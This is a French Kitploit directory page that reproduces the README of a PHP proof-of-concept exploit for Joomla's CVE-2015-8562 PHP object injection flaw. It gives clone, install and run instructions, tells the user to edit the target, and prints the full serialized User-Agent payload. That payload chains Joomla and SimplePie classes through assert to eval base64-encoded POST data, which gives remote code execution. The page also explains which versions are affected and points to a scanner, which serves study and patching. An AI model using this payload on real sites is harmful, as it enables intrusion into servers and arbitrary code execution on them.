Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Une preuve de concept pour la vulnérabilité CVE-2015-8562 de Joomla | Kitploit
Outils/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Une preuve de concept pour la vulnérabilité CVE-2015-8562 de Joomla

Voir le dépôt
210il y a 10 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Joomla-CVE-2015-8562-PHP-POC

Un proof of concept pour la vulnérabilité CVE-2015-8562 de Joomla

Preview

Introduction

Ce PoC est une copie quasi identique de l'implémentation Python de Gary hébergée sur exploit-db.

Utilisation

C'est très simple à installer :

git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Une fois que composer a tout installé, vous devrez modifier $target dans exploit.php.

Après cela, vous êtes prêt à lancer :

php exploit.php

CVE-2015-8562

En décembre 2015, une vulnérabilité a été découverte dans Joomla. Elle permet à des attaquants distants de mener des attaques par injection d'objets PHP et d'exécuter du code PHP arbitraire via l'en-tête HTTP User-Agent.

Cette vulnérabilité touche toutes les versions de Joomla. Un correctif pour les versions v1.5.x, v2.5x et v3.x a déjà été publié.

Si vous utilisez PHP >= 5.4.45, >= 5.5.29 ou >= 5.6.13, vous êtes tranquille car cet exploit utilise également CVE-2015-6835.

Nikos Verschore de PatrolServer a rédigé un article de blog très détaillé et a été d'une grande aide pour comprendre cette vulnérabilité. Vous pouvez utiliser leur mini-scanner gratuitement pour vérifier si votre site est en danger.

Le véritable exploit

Voici à quoi ressemble l'en-tête User-Agent envoyé :

jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
Télécharger l’outil